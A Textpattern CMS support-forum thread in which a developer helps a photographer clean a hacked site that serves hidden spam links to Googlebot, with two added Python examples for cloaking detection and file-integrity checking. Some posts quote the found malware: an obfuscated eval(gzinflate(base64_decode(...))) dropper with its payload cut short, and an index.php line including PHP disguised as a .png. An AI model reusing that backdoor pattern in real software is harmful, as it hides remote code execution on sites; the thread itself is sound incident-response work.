
Textpattern CMS support forum


#1 2016-08-16 11:09:50

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233

I think my TXP install is hacked!

Help!

Google sometimes shows the text ‘This site might be hacked’ in search results. I’ve also had a couple of random messages from people saying they think it’s hacked.

It also reports a possible hack in the Google Console. When I fetch and render a page, the Google render shows this:

Hacked

There is no death penalty post on my site of course. When I view it myself, it looks normal.

Normal

Here’s the link:

Live link

Google Console reports these pages as possibly hacked:

http://www.rossharvey.com/blog?pg=12
http://www.rossharvey.com/slideshows/a-sunset-wedding
http://www.rossharvey.com/weddings/best-of-wedding-photography
http://www.rossharvey.com/weddings/castle-rising
http://www.rossharvey.com/weddings/crazy-bear-wedding-oxford-claire-ian
http://www.rossharvey.com/weddings/destination-wedding-photographer-hawaii-joy-george
http://www.rossharvey.com/weddings/diary-barns-norfolk
http://www.rossharvey.com/weddings/eynsham-hall-wedding
http://www.rossharvey.com/weddings/hambleton-hall-wedding
http://www.rossharvey.com/weddings/south-farm-wedding

I asked my host to scan my site and he said these pages were flagged as potentials (but not definite):

/public_html/textpattern/include/txp_plugin.php
/public_html/textpattern/lib/txplib_forms.php
/public_html/textpattern/publish.php
/public_html/textpattern/publish/log.php
/public_html/textpattern/tiny_mce/themes/simple/img/icons.php
/public_html/textpattern/tiny_mce/themes/simple/view.php
/public_html/textpattern/update/_update.php

Not good! Any ideas?

Last edited by rossharvey (2016-08-16 11:11:06)


#2 2016-08-16 12:56:20

Bloke
Developer
From: Leeds, UK
Registered: 2006-01-29
Posts: 11,250

Re: I think my TXP install is hacked!

rossharvey wrote #300659:

Help!

I’ll try!

First off, yes it looks as if your site has been compromised. If you have access to curl on the command line you can prove this:

curl -A "Googlebot" www.rossharvey.com

Right at the bottom you can see hundreds of fake links like this added:

<a href='http://www.rossharvey.com/blog?pg=8'>argument essay on legalizing weed</a><br>
<a href='http://www.rossharvey.com/blog?pg=5'>professional essay editing service</a><br>
<a href='http://www.rossharvey.com/blog?pg=2'>best essay writing sites</a><br>
...

So, first thing to do if you haven’t already, is to change your passwords: your Txp admin login, MySQL and hosting/FTP passwords. Email too if it’s hosted on the same domain.

Second, backup the Txp database and make sure you download a copy of the SQL dump to your local machine.

Check your Admin->Diagnostics panel. Does it show any “changed” files in core? That lets us know if we’re dealing with something that’s modded files, or if it’s something additional that’s been installed and hooked into your site somehow.

Have a quick look at your /images folder on your host. Just scooch down the (zillions of?) files in there, scanning for anything that’s not an image. If there’s only jpgs in there, great. If there’s anything not an image, delete it. Should be clean, but you never know. I’ve seen hacks where there are files with a .png extension that actually weren’t PNGs at all but PHP files. Cheeky buggers.

You could do the same with your /files folder too, if you use it, though that’s a bit more tricky. Just check that any files you’ve stored are actually files you’ve put there and ditch anything else. You can cross-reference the files in there with the ones shown in the Content->Files panel. The ‘link files’ dropdown at the top is handy as it shows you any files in that folder that are not in your database. If the dropdown is missing, nothing’s been added.

Backup every file under your site root except your images folder (because that’ll take all week!) to your local computer, just in case you’re using plugins that have extra configuration files lurking around (e.g. glz_custom_fields).

Next, obtain a fresh copy of Txp 4.5.7 from the .com site. Delete the /textpattern folder on your host. Also delete index.php and css.php, and probably any js or css folders you have in site root. Plus anything else up there — especially PHP, CSS or JS and anything in the tmp folder. Pretty much, delete everything and just leave all the images, unless you have very good reason to need a particular file and you’re 100% sure it’s clean.

Check the local copy of your textpattern/config.php file that you downloaded is clean. It’s fairly small as you know, so should be easy to spot anything untoward. Clear out anything that may have been added.

Then upload your fresh copy of Txp — minus the setup folder — and also upload your verified config.php. Refresh your website in the browser. Unless you had plugins that used files that were deleted, everything should still show up fine. Browse a bit, check it all still works okay. If not, check your local backup for any files that might be necessary and re-upload them one by one. Check each file looks clean in a text editor first, though, in case something malicious has snuck into one of them. If you’re not sure, post anything suspicious here or send it to one of us to look at.

Then, check the whole site again with the Googlebot crawler (or a few pages with that curl command) and see if those links have gone. If so, yay! If not, we’ll need to dig deeper into your database as there may be something in your Page/Form templates. But my gut feeling is a malicious extra file or two that are being called or have been overwritten.

Check your Admin->Diagnostics panel again too. It should report clean.

Any questions, just shout and we’ll see what we can do to help.

EDIT: Once we find the infection, before you delete your local backup of your site, I’d love to take a look at any infected files along with a copy of your high diagnostics to see if I can figure out if it was Txp itself that was compromised, or a plugin, or if it’s more likely to have come from a hacked password or another piece of software on your (shared?) host.


The smd plugin menagerie — for when you need one more gribble of power from Textpattern. Bleeding-edge code available on GitHub.

Txp Builders – finely-crafted code, design and Txp

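The curl check above, automated, as an added example that is not part of the thread or of Textpattern: it fetches a page once with a Googlebot user agent and once with an ordinary browser user agent and reports the links that only the bot copy contains, which is exactly the cloaked-spam symptom Google flagged. The user-agent strings, the regex-based link extractor and the function names are this example's own assumptions; the comparison functions work on any two HTML strings, so they can be exercised offline on constructed pages.

```python
"""Compare what Googlebot is served with what a browser is served.

Added example (not from the thread): automates `curl -A "Googlebot" <url>`
and diffs the anchor tags. fetch() needs the network; the comparison
functions below it work on any two HTML strings.
"""
import re
import urllib.request

# Assumed user-agent strings; only the "Googlebot" token usually matters.
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"

# Good enough for injected <a href='...'>text</a> runs; not a full HTML parser.
_HREF = re.compile(r"""<a\s[^>]*?href\s*=\s*['"]([^'"]+)['"][^>]*>(.*?)</a>""",
                   re.I | re.S)


def extract_links(html):
    """Return (href, anchor text) pairs, anchor text collapsed to one line."""
    return [(href, " ".join(text.split())) for href, text in _HREF.findall(html)]


def cloaked_links(bot_html, normal_html):
    """Links present only in the Googlebot copy: the SEO-spam signature."""
    normal = set(extract_links(normal_html))
    return [link for link in extract_links(bot_html) if link not in normal]


def fetch(url, user_agent, extra_headers=None, timeout=20):
    """GET url with the given User-Agent; extra_headers lets you add e.g. a
    Referer, since some injectors key on that as well as on the UA."""
    headers = {"User-Agent": user_agent}
    headers.update(extra_headers or {})
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def check_cloaking(url):
    """Fetch url twice and return the links only Googlebot gets to see."""
    return cloaked_links(fetch(url, GOOGLEBOT_UA), fetch(url, BROWSER_UA))


if __name__ == "__main__":
    import sys
    for url in sys.argv[1:]:
        extra = check_cloaking(url)
        print(f"{url}: {len(extra)} link(s) shown only to Googlebot")
        for href, text in extra[:20]:
            print(f"  {href}  ->  {text!r}")
```

Run it against the pages Google Console listed (for example `python cloak_check.py http://www.rossharvey.com/blog?pg=12`) before and after a clean-up. An empty result is not proof of a clean site: injectors sometimes also look at the Referer header or the client IP range, so repeat with `extra_headers={"Referer": "https://www.google.com/"}` if the UA check alone comes back clean while Google still complains.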

#3 2016-08-16 13:53:14

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233

Re: I think my TXP install is hacked!

Hey Stef, thanks!

I’ve changed all my passwords and backed everything up.

Image and files directories are clean, however I spotted a rather suspicious looking file named txp_SnuTAn in tmp. Contents:

<?php
eval(gzinflate(base64_decode('TZzXrvPsdp3P***loads more stuff***96//9W//Dw==')));?>

Evil?

Also, Diagnostics:

Some Textpattern files have been modified: 
/var/sites/r/rossharvey.com/public_html/index.php, 
/var/sites/r/rossharvey.com/public_html/textpattern/lib/class.thumb.php

Pretty sure someone tweaked my broken site for me once so not sure if that’s anything to do with it. Here’s the contents:

Index.php

<?php
/*
$HeadURL: https://textpattern.googlecode.com/svn/releases/4.5.7/source/index.php $
$LastChangedRevision: 4086 $
*/

	// Make sure we display all errors that occur during initialization
        @include_once '/var/sites/r/rossharvey.com/public_html/images/banner/logo_small.png';
	error_reporting(E_ALL);
	@ini_set("display_errors","1");

	if (@ini_get('register_globals')) {
		if (isset($_REQUEST['GLOBALS']) || isset($_FILES['GLOBALS'])) {
			die('GLOBALS overwrite attempt detected. Please consider turning register_globals off.');
		}

		// Collect and unset all registered variables from globals
		$_txpg = array_merge(
			isset($_SESSION) ? (array) $_SESSION : array(),
			(array) $_ENV,
			(array) $_GET,
			(array) $_POST,
			(array) $_COOKIE,
			(array) $_FILES,
			(array) $_SERVER);

		// As the deliberately awkward-named local variable $_txpfoo MUST NOT be unset to avoid notices further down
		// we must remove any potentially identical-named global from the list of global names here.
		unset($_txpg['_txpfoo']);
		foreach ($_txpg as $_txpfoo => $value) {
			if (!in_array($_txpfoo, array(
				'GLOBALS',
				'_SERVER',
				'_GET',
				'_POST',
				'_FILES',
				'_COOKIE',
				'_SESSION',
				'_REQUEST',
				'_ENV',
			))) {
				unset($GLOBALS[$_txpfoo], $$_txpfoo);
			}
		}
	}

	define("txpinterface", "public");

	if (!defined('txpath'))
	{
		define("txpath", dirname(__FILE__).'/textpattern');
	}

	// save server path to site root
	if (!isset($here))
	{
		$here = dirname(__FILE__);
	}

	// pull in config unless configuration data has already been provided (multi-headed use).
	if (!isset($txpcfg['table_prefix']))
	{
		// Use buffering to ensure bogus whitespace in config.php is ignored
		ob_start(NULL, 2048);
		include txpath.'/config.php';
		ob_end_clean();
	}

	include txpath.'/lib/constants.php';
	include txpath.'/lib/txplib_misc.php';
	if (!isset($txpcfg['table_prefix']))
	{
		txp_status_header('503 Service Unavailable');
		exit('config.php is missing or corrupt.  To install Textpattern, visit <a href="./textpattern/setup/">textpattern/setup/</a>');
	}

	// custom caches et cetera?
	if (isset($txpcfg['pre_publish_script']))
	{
		require $txpcfg['pre_publish_script'];
	}

	include txpath.'/publish.php';
	textpattern();

?>

class.thumb.php is empty.


#4 2016-08-16 13:54:55

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233

Re: I think my TXP install is hacked!

I’ll await any ideas at this point before committing to a full re-install and whatnot, this couldn’t be worse timings-wise!

(Ridiculously busy at the moment.)

Thanks so much for your help.


#5 2016-08-16 14:12:31

Bloke
Developer
From: Leeds, UK
Registered: 2006-01-29
Posts: 11,250

Re: I think my TXP install is hacked!

rossharvey wrote #300662:

spotted a rather suspicious looking file named txp_SnuTAn in tmp. Contents: <?php... Evil?

Yes!

Also, your index.php is compromised. Look at the first three lines:

// Make sure we display all errors that occur during initialization
        @include_once '/var/sites/r/rossharvey.com/public_html/images/banner/logo_small.png';
    error_reporting(E_ALL);
    @ini_set("display_errors","1");

That’s not a stock part of Txp and, if you go and look at the file http://rossharvey.com/images/banner/logo_small.png it’s an obfuscated PHP file, exactly like I mentioned above. The rest of your index.php looks okay after a cursory visual scan.

So, to clean it, get rid of that tmp file you found (I’d be tempted to clean out tmp entirely), get rid of the above lines (or upload a known-good copy of index.php over the top, unless you know it’s been modded for your own needs beforehand) and remove that bogus .png file. Also look for any similar PNGs in that vicinity.

Then run some more Googlebot checks and see if there’s any leftovers. That’s your shortcut mechanism for now and saves a complete reupload, especially since Diagnostics doesn’t list any other changed files.

fwiw, class.thumb.php shouldn’t be empty, but if you’re not using Txp’s thumbnail mechanism, then maybe someone emptied out that file for you so you didn’t get a bajillion thumbnails made. I would expect on an image heavy site such as yours, that might create a huge overhead. *shrug*



#6 2016-08-16 14:27:12

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233

Re: I think my TXP install is hacked!

Cleaned index.php – thanks!

That file doesn’t exist; there is no banner folder in the images directory. That evil file in the temp folder used gz compression – perhaps it was creating it on the fly?

Can you still see that fake image by the way, since I’ve deleted the dodgy one and replaced index.php?

Last edited by rossharvey (2016-08-16 14:31:16)


#7 2016-08-16 14:30:41

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233

Re: I think my TXP install is hacked!

Thumbnails – I wondered why I had none in the images listing! Not sure I dare add it back though :¬)


#8 2016-08-16 14:32:38

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233

Re: I think my TXP install is hacked!

All the dodgy links have gone (Googlebot curl)!

Ping me your PayPal address Stef, need to buy you some beer/coffee :¬)


#9 2016-08-16 14:38:58

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233

Re: I think my TXP install is hacked!

Just to be sure, what should the R/W permissions be on the tmp folder? Anything else I should do to find out how it got in in the first place?


#10 2016-08-16 15:33:25

Bloke
Developer
From: Leeds, UK
Registered: 2006-01-29
Posts: 11,250

Re: I think my TXP install is hacked!

rossharvey wrote #300665:

Cleaned index.php – thanks!

Cool. Yep, looks like everything’s back to normal. But I think the rabbit hole goes a little deeper. Dig with me…

That [banner] file doesn’t exist; there is no banner folder in the images directory. That evil file in the temp folder used gz compression – perhaps it was creating it on the fly?

Maybe. But I can still directly visit www.rossharvey.com/images/banner/logo_small.png and the browser still says the file “contains errors” (which is its polite way of saying it’s not a PNG it can interpret as an image, which it can’t do because it’s base64’d PHP code). I downloaded it. It’s not very friendly.

I’ve force-refreshed, so unless there’s some caching going on that’ll eventually flush itself out, my browser still thinks that file exists. If I alter the filename at all, even by one character, I get your front page. So if there’s no banner folder then, unless I’m very much mistaken, that leaves one avenue: it’s being redirected by an .htaccess file somewhere.

Can you have a nose around? Check if there’s an .htaccess in your /images folder. If so, open the file up in a text editor and check. As far as I can recall, there shouldn’t be one in that folder unless you’re doing something extra special to prevent hotlinking of your photos. If it’s being redirected, the endpoint will be revealed and you can go to that location in your host’s filesystem and delete the actual file it’s serving. Then, you can delete the dubious lines in there and see if you can access that URL.

If it’s not there, check the main .htaccess in site root and check there’s no sneaky redirection added to that. Again, anything odd beyond the stock one in core, delete the file it points to, get rid of the extraneous htaccess rule(s) and try again.

Just for completeness, you should check the admin side .htaccess file too; the one inside the textpattern folder. There might be nothing there, but since scripts aren’t known for their cleverness or subtlety, it might have just searched for every .htaccess file it could find.

Hope that peels back another layer of this pest.



#11 2016-08-16 15:45:17

Bloke
Developer
From: Leeds, UK
Registered: 2006-01-29
Posts: 11,250

Re: I think my TXP install is hacked!

rossharvey wrote #300668:

Just to be sure, what should the R/W permissions be on the tmp folder?

As low as you can go; ostensibly the same as the surrounding folders, usually rwxrwxr-x (775). If you can move the tmp folder outside docroot (make a new folder somewhere, change your Admin->Preferences (Advanced) to point to it and delete the old one in the textpattern folder) then all the better.

Anything else I should do to find out how it got in in the first place?

At the moment there’s not much to go on. Could be a hacked password — yours or anyone else hosted on your server — or a compromised script/plugin that allowed elevated privileges. The created/modified datestamp on any affected or new files might give you a clue as to when it occurred, but the stamps can be faked so don’t rely on it.

Other than that, forensics on this sort of thing are kinda hard. I’d be interested to know which plugins you have installed anyway, in case I need to review any of mine as I make them ready for 4.6.0.

One other thing you could try is the smd_prognostics plugin which you can tell to monitor your filesystem (I wouldn’t advise getting it to monitor your images folder though!) It won’t necessarily detect what caused the intrusion, but it can email or alert you pretty soon afterwards if something changes so you can tend to it quickly and stamp out any intrusion like we just did. Might be worth a shot when (if) you get 10 minutes to spare from taking amazing, award-winning photographs :-)


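The change detection behind the Diagnostics "changed files" list and behind a filesystem monitor such as smd_prognostics, written out as an added example so the mechanism is concrete. This is not Textpattern or smd code: it records a SHA-256 of every file's content rather than trusting modification times, which the post above notes can be faked, and diffs two snapshots into added, removed and modified files. The function names, the default skip list and the constructed `demo()` tree are this example's own assumptions.

```python
"""File-integrity baseline for a site tree. Added example, not Textpattern or
smd_prognostics code; paths and the sample tree in demo() are constructed."""
import hashlib
import json
import os
import tempfile


def manifest(root, skip_dirs=("images",)):
    """{relative path: sha256 hex} for every readable file under root.
    Top-level directories in skip_dirs are ignored (the photo library is
    enormous and should get its own baseline)."""
    out = {}
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath == root:
            dirnames[:] = [d for d in dirnames if d not in skip_dirs]
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            h = hashlib.sha256()
            try:
                with open(full, "rb") as fh:
                    for chunk in iter(lambda: fh.read(1 << 16), b""):
                        h.update(chunk)
            except OSError:
                continue
            out[os.path.relpath(full, root).replace(os.sep, "/")] = h.hexdigest()
    return out


def diff_manifests(baseline, current):
    """Sorted lists of paths that appeared, vanished or changed content."""
    return {
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
        "modified": sorted(p for p in current
                           if p in baseline and baseline[p] != current[p]),
    }


def save_manifest(m, path):
    """Write the baseline as JSON; keep this copy OFF the web server."""
    with open(path, "w") as fh:
        json.dump(m, fh, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path) as fh:
        return json.load(fh)


def demo():
    """Constructed: take a baseline, then replay the changes from this thread
    (index.php patched, a dropper in tmp/, class.thumb.php emptied)."""
    with tempfile.TemporaryDirectory() as root:
        def put(rel, data):
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(data)
        put("index.php", b"<?php\nerror_reporting(E_ALL);\n")
        put("textpattern/lib/class.thumb.php", b"<?php class wet_thumb {}\n")
        put("textpattern/config.php", b"<?php $txpcfg['db'] = 'txp';\n")
        put("images/a.jpg", b"\xff\xd8\xff" + b"\x00" * 8)
        base = manifest(root)
        put("index.php", b"<?php\n@include_once '/x/images/banner/logo_small.png';\n"
                         b"error_reporting(E_ALL);\n")
        put("textpattern/lib/class.thumb.php", b"")
        put("textpattern/tmp/txp_SnuTAn", b"<?php eval(gzinflate(base64_decode('...')));?>")
        put("images/b.jpg", b"\xff\xd8\xff")  # in a skipped dir: must not show up
        return diff_manifests(base, manifest(root))


if __name__ == "__main__":
    import sys
    if sys.argv[1] == "baseline":
        save_manifest(manifest(sys.argv[2]), sys.argv[3])
    else:
        print(json.dumps(diff_manifests(load_manifest(sys.argv[3]),
                                        manifest(sys.argv[2])), indent=1))
```

Two ways to use it. For a one-off check against a known-good tree, unpack a fresh Txp 4.5.7 download locally and compare `manifest(fresh_dir)` with `manifest(installed_dir)`; that is essentially what Diagnostics does with the checksums shipped in core, minus the false positives from files you legitimately changed. For ongoing monitoring, take a baseline right after the clean-up (`python integrity.py baseline /path/to/public_html baseline.json`) and re-run the diff from cron, mailing yourself the output when it is non-empty. Download the baseline along with the SQL dump: if it stays in the web root, whoever can write a dropper there can also regenerate it.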

#12 2016-08-16 15:58:36

rossharvey
Member
From: Earth. Sometimes.
Registered: 2005-03-16
Posts: 233

Re: I think my TXP install is hacked!

Hmmm, there’s no .htaccess in the images folder. I’ve scoured the server and checked each folder and there is nothing out of place in any .htaccess.

There’s also an old online image gallery (buy photography prints) on that server but it’s not been used for a long time. I’ve checked that folder, galleries it’s called, and couldn’t find anything that looked out of place.

Happy to give you the login credentials if you’d like to have a peep yourself!

Last edited by rossharvey (2016-08-16 15:58:48)

